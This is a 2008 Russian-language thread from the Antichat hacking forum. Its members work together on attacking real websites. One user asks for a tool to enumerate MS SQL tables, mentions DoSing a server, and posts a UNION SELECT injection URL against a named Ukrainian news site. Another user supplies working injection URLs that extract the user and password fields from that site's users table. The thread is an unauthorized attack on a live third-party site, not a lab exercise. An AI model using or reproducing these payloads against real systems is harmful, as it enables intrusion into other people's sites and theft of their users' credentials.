ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1711  
Старый 19.04.2008, 14:09
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Народ, естьу кого прога для перебора таблиц и колонок?)). Я так вручную заебусь перебирать.через браузер)) (1462 символа :РР).Есь скуля инж тул, но я хз как ей перебирать - какие-то пост параметры )

Последний раз редактировалось Велемир; 19.04.2008 в 14:12..
 

  #1712  
Старый 19.04.2008, 14:23
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию

Цитата:
Сообщение от Велемир  
Народ, естьу кого прога для перебора таблиц и колонок?)). Я так вручную заебусь перебирать.через браузер)) (1462 символа :РР).Есь скуля инж тул, но я хз как ей перебирать - какие-то пост параметры )
я не понял, тебе нужен подбор таблиц или количества выводимых полей?
 

  #1713  
Старый 19.04.2008, 14:26
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

перебор таблиц и колонок м мс скуля сервер:РР.Руками заебалсо уже.И ещё вот при отображении вывелась ошибка :

ADODB.Field ошибка '800a0bcd'

BOF èëè EOF èìååò çíà÷åíèå True, ëèáî òåêóùàÿ çàïèñü óäàëåíà. Äëÿ âûïîëíÿåìîé îïåðàöèè òðåáóåòñÿ òåêóùàÿ çàïèñü.

/item.asp, line 13

EOF обозначает конец файла как я помню, а что тут нипонятно)).Ещё и каракули стоят)).Есь какой-нить способ обойти кодировку,а то аес не пашет )

прочитал вот,и узнал,что эт знач юзера удалили))).Но пароль егр почему-то есть,а юзерид и ид_юзер выдают эту ошибку с концом файла)).И чтойто значит?

Последний раз редактировалось Велемир; 19.04.2008 в 15:12..
 

  #1714  
Старый 19.04.2008, 15:40
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

мм, это значит, что по твоему sql запросу не получено не каких данных, насчет аес? это T-SQL, там нет aes_decrypt
__________________
Карфаген должен быть разрушен...
 

  #1715  
Старый 19.04.2008, 17:57
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Че делать то.....логина нет,а пароль есь? гггг))
 

  #1716  
Старый 19.04.2008, 22:49
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Бля почему бенчмарком не задосить серв ?

И ещё вопрос: как тут обойти фильтрацию ? перепробывал уже всё,но даже ошибку при запросе к мускулу выдаёт одну и ту же.

http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,char(117),char(115),char(114 ),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--&lng=en

Удалось вывести только юзера, базу и версию(4.1 кстати).Пробывал и чар, и юрлкодирвоание,и аес, хекс - по нулям )(. Мошь есть у кого варианты что делать тут ?)

Последний раз редактировалось Велемир; 20.04.2008 в 00:44..
 

  #1717  
Старый 20.04.2008, 19:17
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637

Репутация: 27
По умолчанию

может я конечно ошибаюсь. но....
Код:
http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users+limit+1,1/*&lng=en
http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users+limit+0,1/*&lng=en
 

  #1718  
Старый 20.04.2008, 23:31
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

абалдеть.....как я так мимо пройти мог ппц:Р.Ничё бля не закодировано, а выдаёт какую-то левую ошибку.)(
 

  #1719  
Старый 20.04.2008, 23:48
VentRu
Новичок
Регистрация: 27.09.2007
Сообщений: 11
Провел на форуме:
142777

Репутация: 4
По умолчанию

Велемир, только твой мат удерживает от того, чтобы добавить тебе репутацию.
 

  #1720  
Старый 21.04.2008, 01:07
Loker
Познающий
Регистрация: 25.10.2007
Сообщений: 69
Провел на форуме:
348179

Репутация: 52
По умолчанию

Цитата:
Сообщение от Grema  
может я конечно ошибаюсь. но....
Код:
http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users+limit+1,1/*&lng=en
http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users+limit+0,1/*&lng=en
А к чему &lng=en, у тебя стоит коментарий /* и все что после него пишеться будет просто опускаться.
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ